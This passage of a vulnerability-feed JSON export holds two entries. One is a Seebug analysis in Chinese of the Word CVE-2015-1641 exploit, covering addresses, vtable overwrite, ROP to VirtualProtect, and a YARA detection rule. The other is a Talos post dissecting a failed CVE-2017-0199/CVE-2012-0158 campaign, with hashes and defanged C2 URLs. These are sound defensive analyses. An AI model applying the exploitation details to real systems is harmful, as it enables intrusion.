Jobs\u88ab\u8bc6\u522b\u4e3a\u4eba\u540d\uff0c\u5219smartTag\u6807\u7b7e\u53ef\u4ee5\u6267\u884c\u8bf8\u5982\u6253\u5f00\u901a\u8baf\u5f55\u3001\u6dfb\u52a0\u5230\u8054\u7cfb\u4eba\u3001\u9884\u7ea6\u4f1a\u8bae\u7b49\u64cd\u4f5c\uff0c\u7ed9office\u7528\u6237\u63d0\u4f9b\u66f4\u591a\u81ea\u5b9a\u4e49\u7684\u667a\u80fd\u9009\u62e9\u3002displacedByCustomXml\u5728\u5f88\u591a\u6807\u7b7e\u4e2d\u90fd\u53ef\u4ee5\u4f7f\u7528\uff0c\u76ee\u7684\u662f\u5f53\u524d\u6807\u7b7e\u5904\u9700\u8981\u88ab\u4e00\u4e2acustomXML\u4e2d\u7684\u5185\u5bb9\u4ee3\u66ff\uff0c\u5b83\u7684\u503c\u662fnext\u8868\u793a\u88ab\u4e0b\u4e00\u4e2acustomXML\u4ee3\u66ff\uff0cprev\u5219\u8868\u793a\u88ab\u4e0a\u4e00\u4e2a\u4ee3\u66ff\u3002\r\n\r\n\u8fd9\u4e2a\u6f0f\u6d1e\u662f\u4e00\u4e2a\u7c7b\u578b\u6df7\u6dc6\u6f0f\u6d1e\uff0c\u672c\u6765\u5e26\u6709displacedByCustomXml\u7684\u6807\u7b7e\u4f1a\u88ab\u4e0a\u4e00\u4e2a\u6216\u4e0b\u4e00\u4e2acustomXML\u4ee3\u66ff\uff0c\u4f46\u662fword\u6ca1\u6709\u5bf9\u4f20\u5165\u7684customXML\u5bf9\u8c61\u8fdb\u884c\u4e25\u683c\u7684\u6821\u9a8c\uff0c\u5bfc\u81f4\u53ef\u4ee5\u4f20\u5165\u8bf8\u5982smartTag\u5bf9\u8c61\uff0c\u7136\u800csmartTag\u5bf9\u8c61\u7684\u5904\u7406\u6d41\u7a0b\u548ccustomXML\u5e76\u4e0d\u76f8\u540c\uff0c\u4e0a\u8ff0\u7279\u6b8a\u5904\u7406\u7684smartTag\u6807\u7b7e\u4e2d\u7684element\u5c5e\u6027\u503c\u4f1a\u88ab\u5f53\u4f5c\u662f\u4e00\u4e2a\u5730\u5740\uff0c\u968f\u540e\u7ecf\u8fc7\u7b80\u5355\u7684\u8ba1\u7b97\u5f97\u5230\u53e6\u4e00\u4e2a\u5730\u5740\u3002\u6700\u540e\u5904\u7406\u6d41\u7a0b\u4f1a\u5c06moveFromRangeEnd\u7684id\u503c\u8986\u76d6\u5230\u4e4b\u524d\u8ba1\u7b97\u51fa\u6765\u7684\u5730\u5740\u4e2d\uff0c\u5bfc\u81f4\u4efb\u610f\u5185\u5b58\u5199\u5165\uff0c\u6f0f\u6d1e\u4ee3\u7801\u5982\u4e0b\uff1a\r\n\r\n\r\n\r\n\u901a\u8fc7\u4e0b\u9762\u7684\u8865\u4e01\u5bf9\u6bd4\u53ef\u4ee5\u5f88\u5bb9\u6613\u770b\u5230\u6253\u4e0a\u6700\u65b0\u8865\u4e01\u7684word\u4ee3\u7801\u589e\u52a0\u4e86\u5bf9customXML\u5bf9\u8c61\u5904\u7406\u51fd\u6570\u7684\u6821\u9a8c\uff1a\r\n\r\n\r\n\r\n### 0x03 \u6f0f\u6d1e\u5229\u7528\u5206\u6790\r\n\r\n\u5229\u7528\u7684\u5206\u6790\u73af\u5883\u4e3awin7 64\u4f4d+office2010 sp2 32\u4f4d\u3002\r\n\r\n\u867d\u7136\u8fd9\u4e0a\u9762\u67094\u4e2asmartTag\u6807\u7b7e\uff0c\u4f46\u5c31\u76ee\u524d\u5206\u6790\u6765\u770b\uff0c\u524d\u4e24\u4e2a\u6807\u7b7e\u662f\u6f0f\u6d1e\u5229\u7528\u7684\u5173\u952e\u3002\u9996\u5728\u89e3\u6790\u7b2c\u4e00\u4e2asmartTag\u6807\u7b7e\u65f6\u4f1a\u628a\u5176moveFromRangeEnd\u5b50\u6807\u7b7e\u7684id\u8fdb\u884c\u89e3\u6790\uff0c\u7136\u540e\u5199\u52300x7c38bd74\u8fd9\u4e2a\u5730\u5740\u4e2d\u53bb\uff0c\u8fd9\u4e2a\u5730\u5740\u662f\u6839\u636esmartTag\u7684element\u53730x7c38bd50\u8ba1\u7b97\u51fa\u6765\u7684\uff1a\r\n\r\n\r\n\r\n\u7136\u540e\u89e3\u6790\u7b2c\u4e8c\u4e2asmartTag\u6807\u7b7e\uff0cesi\u6307\u5411\u7684\u5185\u5b58\u5c31\u662fsmartTag\u7684\u7ed3\u6784\u4f53\uff0cesi+4\u7684\u5185\u5bb9\u662felement\u5c5e\u6027\u503c\uff1a\r\n\r\n\r\n\r\n\u800ceax\u7684\u503c\u4e3a0x7C376FC3\uff0c\u521a\u597d\u5c31\u662fmoveFromRangeEnd\u5bf9\u8c61id \"2084007875\"\u7684\u5341\u516d\u8fdb\u5236\u503c\uff1a\r\n\r\n\r\n\r\n\u7136\u540e\u8986\u76d6MSVCR71.dll\u4e2d0x7c38a428\uff0c\u8fd9\u662f\u4e00\u4e2a\u865a\u51fd\u6570\u7684\u6307\u9488\uff0c\u800c0x7c38a428\u8fd9\u4e2a\u5730\u5740\u662f\u901a\u8fc7\u5f53\u524dsmartTag\u7684element\u5c5e\u6027\u503c\u53730x7c38bd68\u548c\u7b2c\u4e00\u4e2asmartTag\u6807\u7b7e\u4e2dmoveFromRangeStart\u7684id\u5171\u540c\u8ba1\u7b97\u51fa\u6765\u7684\uff1a\r\n\r\n\r\n\r\n\u8c03\u8bd5\u53ef\u4ee5\u770b\u5230\u5982\u4e0b\u5185\u5b58\uff0cecx\u7684\u5185\u5b58\u5982\u4e0b\uff0cecx+0xc\u5c31\u662f\u4e0a\u9762\u89e3\u6790\u7b2c\u4e00\u4e2asmartTag\u6807\u7b7e\u65f6\u5199\u5165\u7684\u503c\uff0c\u6700\u7ec8\u8ba1\u7b97\u5f97\u5230\u7684\u88ab\u8986\u76d6\u7684\u5730\u5740\u4fbf\u662f0x7c38a428\uff1a\r\n\r\n\r\n\r\n\u800c\u5728\u8986\u76d6\u4e4b\u524d0x7c38a428\u5904\u7684\u6307\u9488\u6307\u5411kernel32! FlsGetValue:\r\n\r\n\r\n\r\n\u6700\u540e\u8c03\u7528memcpy\u51fd\u6570\u8fdb\u884c\u8986\u76d6\uff1a\r\n\r\n\r\n\r\n\u8986\u76d6\u4e4b\u540e\u76840x7c38a428\u6307\u5411\u7684\u4fbf\u662f\u653b\u51fb\u8005\u60f3\u8981\u6267\u884c\u7684\u4ee3\u7801\u4f4d\u7f6e\uff1a\r\n\r\n\r\n\r\n\u603b\u7ed3\u4e00\u4e0b\u5229\u7528\u6d41\u7a0b\u5982\u4e0b\uff1a\u9996\u5148smartTag_1\uff08\u7b2c\u4e00\u4e2asmartTag\u6807\u7b7e\uff09\u7684element\u5c5e\u6027\u503c\u8fdb\u884c\u7b80\u5355\u8ba1\u7b97\u5f97\u5230\u4e00\u4e2a\u5730\u5740addr1\uff0c\u7136\u540e\u5c06\u5176moveFromRangeEnd_1\u5b50\u6807\u7b7e\u7684id\u5199\u5165\u5230addr1\u4e2d\u5907\u7528\uff1b\u7136\u540e\u89e3\u6790smartTag_2\uff0c\u6839\u636e\u4ed6\u7684element\u5c5e\u6027\u503c\u548c\u524d\u9762\u8ba1\u7b97\u51fa\u6765\u7684addr1\u5171\u540c\u8ba1\u7b97\u51fa\u53e6\u4e00\u4e2a\u5730\u5740addr2\uff0c\u5e76\u5c06\u5176\u5b50\u6807\u7b7emoveFromRangeEnd_2\u7684id\u5199\u5165\u5230addr2\uff0c\u800caddr2\u662f\u4e00\u4e2a\u865a\u51fd\u6570\u8868\u4e2d\u7684\u5730\u5740\uff0c\u8fd9\u6837\u539f\u672c\u662f\u8fd9\u4e2a\u865a\u51fd\u6570\u7684\u5730\u5740\u5c31\u88ab\u8986\u76d6\u6210\u653b\u51fb\u8005\u60f3\u8981\u6267\u884c\u7684\u4efb\u610f\u4ee3\u7801\u7684\u5730\u5740\uff0c\u6f0f\u6d1e\u5229\u7528\u6210\u529f\u3002\r\n\r\nword\u5728office2010\u7684\u73af\u5883\u4e0b\u6ca1\u6709\u6253\u8865\u4e01\u7684\u60c5\u51b5\u4e0b\u6267\u884c\u7684\u5806\u55b7\u5c04\u540e\u7684\u5730\u5740\u4e3a0x0900080C\uff0c\u5982\u4e0b\uff1a\r\n\r\n\r\n\r\n\u770b\u5230\u8fd9\u6bb5\u5185\u5b58\u60f3\u5fc5\u90fd\u5df2\u7ecf\u6e05\u695a\u4e86\uff0c\u8fd9\u91cc\u5c31\u662fRTF\u6587\u6863\u91ca\u653e\u7684activeX.bin\u6587\u4ef6\u7684\u5185\u5bb9\uff0c\u800c0x7c342404\u5904\u7684\u4ee3\u7801\u662fret\uff0c\u56e0\u6b64\u8fd9\u91cc\u4f1a\u4e00\u76f4\u6267\u884cret\u76f4\u5230\u5230\u8fbe\u6700\u7ec8ROP\u7684\u4f4d\u7f6e\uff0cROP\u94fe\u5982\u4e0b\uff1a\r\n\r\n\r\n\r\n\u6beb\u65e0\u7591\u95eeROP\u7684\u4f5c\u7528\u8fd8\u662f\u8c03\u7528VirtualProtect\u51fd\u6570\u5bf9\u5f53\u524d\u8fd9\u5757\u5185\u5b58\u6dfb\u52a0\u53ef\u6267\u884c\u6743\u9650\uff1a\r\n\r\n\r\n\r\n\u83b7\u5f97\u6267\u884c\u6743\u9650\u4e4b\u540e\u5f00\u59cb\u6267\u884cshellcode\uff1a\r\n\r\n\r\n\r\n### 0x04 \u6f0f\u6d1e\u5229\u7528\u68c0\u6d4b\r\n\r\n\u60f3\u8981\u68c0\u6d4b\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u653b\u51fb\u6837\u672c\u5fc5\u987b\u8981\u5148\u4ecertf\u6587\u6863\u63d0\u53d6\u51fadocx\u7136\u540e\u83b7\u53d6\u5230document.xml\uff0cyara\u89c4\u5219\u5982\u4e0b\uff1a\r\n\r\n```\r\nrule CVE_2015_1641\r\n{\r\n meta:\r\n description=\"Word Type Confusion Vulnerability\"\r\n output=\"Nday & CVE-2015-1641\"\r\n strings:\r\n $smart_tag=/<w:smartTag[\\w\\W]+?w:element=\\\"(&#x[a-zA-Z0-9]{4};){2}\\\">[\\w\\W]+?<w:permStart[\\w\\W]+?w:displacedByCustomXml=\\\"prev\\\"\\/>[\\w\\W]+?<w:permEnd[\\w\\W]+?<\\/w:smartTag>/\r\n condition:\r\n $smart_tag\r\n}\r\n```\r\n\r\n\u4e0a\u9762\u7684\u89c4\u5219\u5339\u914d\u5176\u5b9e\u5c31\u662f\u4e00\u4e2a\u6b63\u5219\u5339\u914d\uff0c\u4ece\u5de6\u5230\u53f3\u6d41\u7a0b\u5982\u4e0b\uff1a1.\u5339\u914d\u5230smartTag\u6807\u7b7e\uff0c\u67e5\u770b\u5176element\u5c5e\u6027\u662f\u5426\u4e3a\u5341\u516d\u8fdb\u5236\u6570\u503c\u4f5c\u4e3a\u5730\u5740\uff1b2.\u5728smartTag\u6807\u7b7e\u4e2d\u5339\u914d\u5230permStart\u6807\u7b7e\uff0c\u5728\u5b83\u7684\u5c5e\u6027\u6216\u5b50\u6807\u7b7e\u7684\u5c5e\u6027\u4e2d\u5b58\u5728displacedByCustomXml=\"prev\"\u3002\u6ee1\u8db3\u4e0a\u8ff0\u4e24\u4e2a\u6761\u4ef6\u5219\u8ba4\u4e3a\u5c31\u662f\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u653b\u51fb\u6837\u672c\u3002\u4f9d\u636e\u4e0a\u9762\u7684yara\u89c4\u5219\u68c0\u6d4b\u8be5\u653b\u51fb\u6837\u672c\u7684document.xml\u7ed3\u679c\u5982\u4e0b\uff1a\r\n\r\n", "published": "2015-12-31T00:00:00", "type": "seebug", "title": "Microsoft Office \u5185\u5b58\u635f\u574f\u6f0f\u6d1e(CVE-2015-1641)", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0158", "CVE-2015-1641"], "modified": "2015-12-31T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-90202", "id": "SSV:90202", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "talosblog": [{"lastseen": "2017-08-14T18:08:43", "bulletinFamily": "blog", "cvelist": ["CVE-2012-0158", "CVE-2017-0199"], "description": "<h3 id=\"h.o562lfhybzl7\">Introduction</h3><br />Since public disclosure in April 2017, <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0199\">CVE-2017-0199</a> has been frequently used within malicious Office documents. The vulnerability allows attackers to include Ole2Link objects within RTF documents to launch remote code when HTA applications are opened and parsed by Microsoft Word.<br /><br />In this recent campaign, attackers combined CVE-2017-0199 exploitation with an earlier exploit, <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158\">CVE-2012-0158</a>, possibly in an attempt to evade user prompts by Word, or to arrive at code execution via a different mechanism. Potentially, this was just a test run in order to test a new concept. In any case, the attackers made mistakes which caused the attack to be a lot less effective than it could have been.<br /><br />Analysis of the payload highlights the potential for the Ole2Link exploit to launch other document types, and also demonstrates a lack of rigorous testing procedures by at least one threat actor.<br /><br /> Attackers are obviously trying to find a way around known warning mechanisms alerting users about potential security issues with opened documents. In this blog post we analyse what happens when an attack attempts to combine these two exploits in a single infection chain and fails.<br /> <br /> Although this attack was unsuccessful it has shown a level of experimentation by attackers seeking to use CVE-2017-0199 as a means to launch additional weaponized file types and avoid user prompts. It may have been an experiment that didn\u2019t quite work out, or it may be indication of future attacks yet to materialise.<br /> <a name='more'></a><br /><br /><h3 id=\"h.8er5iyy5kysj\">Standard CVE-2017-0199 exploitation</h3><div><br /></div>A typical attack exploiting CVE-2017-0199 consists of an email campaign, distributing a malicious RTF document.The vulnerability exists in code that handles Ole2Link embedded objects. Including an Ole2Link in an RTF document allows Word to load other, remote documents within the context of Word.<br /><br /><a href=\"https://1.bp.blogspot.com/-NSSI8BOL22s/WZGK-IAegfI/AAAAAAAAAEs/xw2tx8KHcYslKPmxKeenFiTpokqXf82GwCLcBGAs/s1600/image3.png\" imageanchor=\"1\"><img border=\"0\" data-original-height=\"405\" data-original-width=\"720\" height=\"360\" src=\"https://1.bp.blogspot.com/-NSSI8BOL22s/WZGK-IAegfI/AAAAAAAAAEs/xw2tx8KHcYslKPmxKeenFiTpokqXf82GwCLcBGAs/s640/image3.png\" width=\"640\" /></a> <br /><div style=\"text-align: center;\">Standard CVE-2017-0199 flow</div><br />If the remote OLE2Link points to an HTML application file (HTA file type), vulnerable Word and WordPad versions will parse and execute the application even if the user chooses not to allow inclusion of the remote content. A possible sign of exploitation attempt of CVE-2017-0199 is this Word prompt to the user:<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-0VKBqAUUxXM/WZGL-PIwozI/AAAAAAAAAE4/VF47zZTXA1YZRAVvsArdqLXcIPFgd9l_gCLcBGAs/s1600/image13.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"309\" data-original-width=\"1438\" height=\"138\" src=\"https://2.bp.blogspot.com/-0VKBqAUUxXM/WZGL-PIwozI/AAAAAAAAAE4/VF47zZTXA1YZRAVvsArdqLXcIPFgd9l_gCLcBGAs/s640/image13.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Word prompt displayed to the user before potential CVE-2017-0199 exploit attempt</div><div style=\"text-align: center;\"><br /></div><h3 id=\"h.roxzrd10uaho\">Modified CVE-2017-0199 flow</h3><br />In the case of the modified exploit flow we analyzed, the attack started with an email message containing a malicious attachment. The email employed the usual social engineering tricks to entice the user to open and read the attached document. Referring to the attachment as a purchase order coming from an unknown \"partner\" is a very common social engineering trick of spammed malware. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-Hw3wXiGOBh8/WZGMKf_qe7I/AAAAAAAAAE8/SyyOcUTNsyETwGzn-JB5K07vMiWb_g8NwCLcBGAs/s1600/image6.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"461\" data-original-width=\"1049\" height=\"280\" src=\"https://3.bp.blogspot.com/-Hw3wXiGOBh8/WZGMKf_qe7I/AAAAAAAAAE8/SyyOcUTNsyETwGzn-JB5K07vMiWb_g8NwCLcBGAs/s640/image6.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Email message launching the modified attack</div><div style=\"text-align: center;\"><br /></div>The document attached to the email message is an RTF file including an Ole2Link to a remote document hosted at hxxp://multplelabs [dot] com/ema/order.doc. In this case, the mime content type of the remote document observed in the packet capture of the attack was not the expected application/hta but rather application/msword which was enough to motivate us to dig a little bit deeper in order to find out what the attackers are trying to achieve. <br /><br />The first surprising thing is that the vulnerable version of Word I used for the analysis crashed before it managed to display the prompt commonly seen with CVE-2017-0199 exploitation. Instead of displaying the prompt, Word started to convert the downloaded document and then hung before eventually crashing with a memory access fault. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-HbxzsVEz4ao/WZGMUkypjfI/AAAAAAAAAFA/rDvvv35sIBQ36bARwkAXWqgXohpFwTtfgCLcBGAs/s1600/image4.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"500\" data-original-width=\"1600\" height=\"200\" src=\"https://4.bp.blogspot.com/-HbxzsVEz4ao/WZGMUkypjfI/AAAAAAAAAFA/rDvvv35sIBQ36bARwkAXWqgXohpFwTtfgCLcBGAs/s640/image4.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Word crashes without the prompt</div><br />The crash was caused not by the first exploit stage using CVE-2017-0199 but rather by the second stage using CVE-2012-0158. Here we see the shellcode embedded into a MSComctlLib.ListViewCtrl.2 ActiveX control, which is a telltale sign of CVE-2012-0158. The shellcode starts with a ROP chain followed by the shellcode which starts executing when the vulnerability is triggered. After the ROP chain sets the right permissions for the memory block containing the rest of the shellcode, the first stage of the shellcode is executed. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-pN1c55UKgmM/WZGMmdWIsPI/AAAAAAAAAFE/1-35-nnX3-QAgbUs5LrtWIQ0A8egO_UxwCLcBGAs/s1600/image5.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"330\" data-original-width=\"1600\" height=\"132\" src=\"https://2.bp.blogspot.com/-pN1c55UKgmM/WZGMmdWIsPI/AAAAAAAAAFE/1-35-nnX3-QAgbUs5LrtWIQ0A8egO_UxwCLcBGAs/s640/image5.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">First stage shellcode for CVE-2012-0158</div><br />This stage is responsible for the application crash. The attackers did not seem to have a good quality assurance process or perhaps the technical expertise to understand what will happen if they simply included an automatically generated CVE-2012-0158 exploit in combination with CVE-2017-0199. <br /><br />The shellcode starts with resolving several API addresses, which allow the code to traverse all open files by bruteforcing the handle numbers for open files, starting from zero and increasing the handle number by four for every next open file handle. If the handle exists, the shellcode attempts to check the file size using the GetFileSize API that takes the file handle as the parameter. If the file size is within the expected range the shellcode maps it in memory to perform a file type check. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-Bbadhc3Wgdk/WZGNHxIv82I/AAAAAAAAAFM/JKczbwTVdYIBdFKz5dqgzdmQSHJeWOKswCLcBGAs/s1600/image10.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"875\" data-original-width=\"1537\" height=\"364\" src=\"https://4.bp.blogspot.com/-Bbadhc3Wgdk/WZGNHxIv82I/AAAAAAAAAFM/JKczbwTVdYIBdFKz5dqgzdmQSHJeWOKswCLcBGAs/s640/image10.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Checking the file size and finding file type</div><div style=\"text-align: center;\"><br /></div>The shellcode here incorrectly assumes that if the found file is an RTF file then all the required conditions are met and the identified RTF file must contain the next shellcode stage. Once the shellcode assumes the file size and type requirements are satisfied, it starts to read the mapped file looking for the next stage shellcode marker which is, in our test, never found because the original CVE-2017-0199 exploiting file is still present in memory. This file satisfies both of the conditions searched for by the first stage shellcode. Since the CVE-2017-0199 exploiting file is open before the CVE-2012-0158 document, its handle is smaller and it is read first by the shellcode. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-g8G1hw8kKnE/WZGNXJFLWDI/AAAAAAAAAFQ/1x9IYMV2TaokHwZXIigam-pqlP8CFPSHwCLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"681\" data-original-width=\"1567\" height=\"278\" src=\"https://2.bp.blogspot.com/-g8G1hw8kKnE/WZGNXJFLWDI/AAAAAAAAAFQ/1x9IYMV2TaokHwZXIigam-pqlP8CFPSHwCLcBGAs/s640/image1.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">First stage shellcode looking for the next shellcode stage marker</div><div style=\"text-align: center;\"><br /></div>The shellcode searches for the next stage marker 0xfefefefefeffffffff within the wrong document, without correctly handling reads beyond the document length. This eventually causes a memory protection error by reading memory content past the allocated memory blocks. <br /><br />If the attackers would have been just a little bit more technically savvy they would realize this problem and easily fix it to make these two exploits work together successfully without the prompt to load the remote content being displayed to the end-user. <br /><br />One possible fix involves fixing a single byte to make the file size limits a bit stricter to exclude the original CVE-2017-0199 file size. The other way, just slightly more complex, is to correctly handle cases when the next stage marker is not found within the RTF and assume that the targeted Word process already has other RTF documents opened which satisfy the file size condition.<br /><br />Interestingly enough, the shellcode in the document containing the CVE-2012-0158 exploit will be successfully executed if there are no other open RTF files so we analyzed the remainder for the sake of completeness. <br /><br /><h3 id=\"h.1g5ixz26t8g5\">Second stage shellcode</h3><br />The second stage shellcode is a bit more complex and starts by finding required API functions within ntdll.dll. The API functions are used to launch an instance of svchost.exe in a suspended state, and to overwrite the original entrypoint with the final \"download and execute\" shellcode stage which eventually launches the executable payload.<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-AnfQd5_svWA/WZGNmak1XLI/AAAAAAAAAFU/6wbz-jBtjZ8ohLdOXbTngOBejGtbex34QCLcBGAs/s1600/image9.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"933\" data-original-width=\"1600\" height=\"372\" src=\"https://3.bp.blogspot.com/-AnfQd5_svWA/WZGNmak1XLI/AAAAAAAAAFU/6wbz-jBtjZ8ohLdOXbTngOBejGtbex34QCLcBGAs/s640/image9.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Finding ntdll.dll APIs to inject the last stage and resume svchost.exe process</div><div style=\"text-align: center;\"><br /></div>The last shellcode stage, injected into svchost.exe uses UrlDownloadToFile API to download an executable file from the command and control server into the temporary files folder with the filename name.exe, and calls the ShellExecute function to launch the final payload. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-rmR62a5hMwE/WZGN6M2825I/AAAAAAAAAFY/m32luET2apAMuJn9JlJ6ok6NGzdtbG5kACLcBGAs/s1600/image2.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"575\" data-original-width=\"1350\" height=\"272\" src=\"https://4.bp.blogspot.com/-rmR62a5hMwE/WZGN6M2825I/AAAAAAAAAFY/m32luET2apAMuJn9JlJ6ok6NGzdtbG5kACLcBGAs/s640/image2.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Download and execute stage</div><br />The downloaded executable payload is a packed VB dropper which drops an older Ramnit version, but it also runs Lokibot, based on the observed traffic to the command and control server. Ramnit is a well known self-replicating information stealing bot which also includes a rootkit to hide its presence from the user and security products and is already well documented. Further analysis of this particular piece of malware is outside of the scope of this blog post. Despite being older, the Ramnit family is still a commonly encountered malware family by Talos. It is possible that in this case the attackers intended to launch a Lokibot attack but the sample got infected by the Ramnit file infection component along the way. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://1.bp.blogspot.com/-2Zf6yEqOG-c/WZGOMdZbE4I/AAAAAAAAAFc/ilM-fBaodD4DUP7Qg4aR-Une0myDbPfpwCLcBGAs/s1600/image7.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"392\" data-original-width=\"1054\" height=\"238\" src=\"https://1.bp.blogspot.com/-2Zf6yEqOG-c/WZGOMdZbE4I/AAAAAAAAAFc/ilM-fBaodD4DUP7Qg4aR-Une0myDbPfpwCLcBGAs/s640/image7.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">DNS activity for multplelabs.com</div><br />The domain hosting the malware and the command and control server was registered in October 2016 and it is likely a compromised site, although it seems to have been used by some other Lokibot campaigns. The DNS activity for the domain shows two distinct spikes, which likely indicate two unsuccessful spam campaigns as there has been no additional activity to show increase in communication from infected systems to the command and control server. <br /><br />The DNS activity confirms our findings which document the reasons for the attack failure.<br /><h3 id=\"h.via3e3ir4d9t\">Conclusion</h3><br />CVE-2017-0199 is one of the most commonly used vulnerabilities exploited by malicious documents distributed in spamming campaigns. <a href=\"https://www.virusbulletin.com/blog/2017/06/cve-2017-0199-new-cve-2012-0158/\">Previous work</a> indicates that its popularity with attackers overcame the popularity of CVE-2012-0158. <br /><br />In this blog post we analyse what happens when an attack attempts to combine these two exploits in a single infection chain. In the case of this campaign the attackers made a major mistake that prevented the intended download and execution of the Ramnit payload. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-MfUPazA21cA/WZGOZLENF5I/AAAAAAAAAFg/40RcSVXGHtI-2ZXY5APAF5xYKnAQ_CT6gCLcBGAs/s1600/image11.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"405\" data-original-width=\"720\" height=\"360\" src=\"https://3.bp.blogspot.com/-MfUPazA21cA/WZGOZLENF5I/AAAAAAAAAFg/40RcSVXGHtI-2ZXY5APAF5xYKnAQ_CT6gCLcBGAs/s640/image11.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Attempted combined attack stages</div><br />One has to wonder why did the attackers use the combination of a newer and an older exploit at all? The combination would not be executed if the targeted system had a patch against either of the exploits. In addition, if the targeted system was vulnerable to CVE-2012-0158 it would be much easier for the attackers to use a single exploit targeting this vulnerability.<br /><br />An assumption we can make is that that the attackers used the combination to avoid Word displaying the prompt which may raise suspicions for the target end user. Another possibility is that they attempted to use this combination in order to avoid behavioral detection systems which may be triggering on the combination of Ole2Link in a word document and a download of an HTA file. <br /><br />This attack was unsuccessful, potentially indicating poor testing or quality control procedures by the attackers. However, this does show a level of experimentation by attackers seeking to use CVE-2017-0199 as a means to launch additional weaponized file types and avoid user prompts. This attack may have been an experiment that didn't quite work out, or it may be indication of future attacks yet to materialise.<br /><br /><h3 id=\"h.8lbs60io8ukk\">Coverage</h3><br /><a href=\"https://4.bp.blogspot.com/-zNZW_D3mzfQ/WZGPG8nwAfI/AAAAAAAAAFo/LxZYPEg5C_oqhE-nw0dPwwHFumoST5yTwCLcBGAs/s1600/image8.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"336\" data-original-width=\"400\" height=\"268\" src=\"https://4.bp.blogspot.com/-zNZW_D3mzfQ/WZGPG8nwAfI/AAAAAAAAAFo/LxZYPEg5C_oqhE-nw0dPwwHFumoST5yTwCLcBGAs/s320/image8.png\" width=\"320\" /></a>Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br />CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br />Email Security can block malicious emails sent by threat actors as part of their campaign.<br /><br />Network Security appliances such as NGFW, NGIPS, and Meraki MX with Advanced Security can detect malicious activity associated with this threat.<br /><br />AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.<br /><br />Umbrella prevents DNS resolution of the domains associated with malicious activity.<br /><br />Stealthwatch detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.<br /><h3 id=\"h.3lh94s3hk6jp\">IOCs</h3><br />Documents<br /><br />5ae2f13707ee38e4675ad1bc016b19875ee32312227103d6f202874d8543fc2e - CVE-2017-0199<br />6a84e5fd6c9b2c1685efc7ac8d763048913bad2e767b4958e7b40b4488bacf80 - CVE-2012-0158<br /><br />Executables<br /><br />351aec22d926b4fb7efc7bafae9d1603962cadf0aed1e35b1ab4aad237723474<br />f34e5af97ccb3574f7d5343246138daf979bfd1f9c37590e9a41f6420ddb3bb6<br />43624bf57a9c7ec345d786355bb56ca9f76c226380302855c61277bdc490fdfe<br />d4fbca06989a074133a459c284d79e979293625262a59fbd8b91825dbfbe2a13<br /><br />URLs<br /><br />hxxp://multplelabs[dot]com/ema/order.doc - CVE-2012-0158<br />hxxp://multplelabs[dot]com/ema/nextyl.exe - dropper<br />hxxp://multplelabs[dot]com/freem/50/fre.php - Lokibot C2<br /><br /><div class=\"feedflare\">\n<a 